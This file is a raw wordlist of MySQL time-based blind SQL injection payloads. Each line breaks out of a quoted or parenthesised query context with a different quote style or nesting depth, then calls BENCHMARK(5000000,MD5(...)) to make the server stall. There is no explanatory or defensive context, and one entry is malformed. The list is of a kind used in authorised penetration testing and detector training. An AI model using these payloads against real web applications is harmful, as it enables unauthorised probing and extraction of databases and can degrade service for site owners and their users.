' OR 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' OR 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" OR 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') OR =BENCHMARK(5000000,MD5(0x774c5341))--
') OR 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR ('1337'='1337
')) OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR (('1337'='1337
'))) OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR ((('1337'='1337
' OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR '1337'='1337
') OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR ('1337' LIKE '1337
')) OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR (('1337' LIKE '1337
'))) OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR ((('1337' LIKE '1337
%' OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR '1337%'='1337
' OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR '1337' LIKE '1337
") OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR ("1337"="1337
")) OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR (("1337"="1337
"))) OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR ((("1337"="1337
" OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR "1337"="1337
") OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR ("1337" LIKE "1337
")) OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR (("1337" LIKE "1337
"))) OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR ((("1337" LIKE "1337
" OR 1337=BENCHMARK(5000000,MD5(0x576e7a57)) OR "1337" LIKE "1337
' OR 1337=BENCHMARK(5000000,MD5(0x576e7a57)) OR '1337'='1337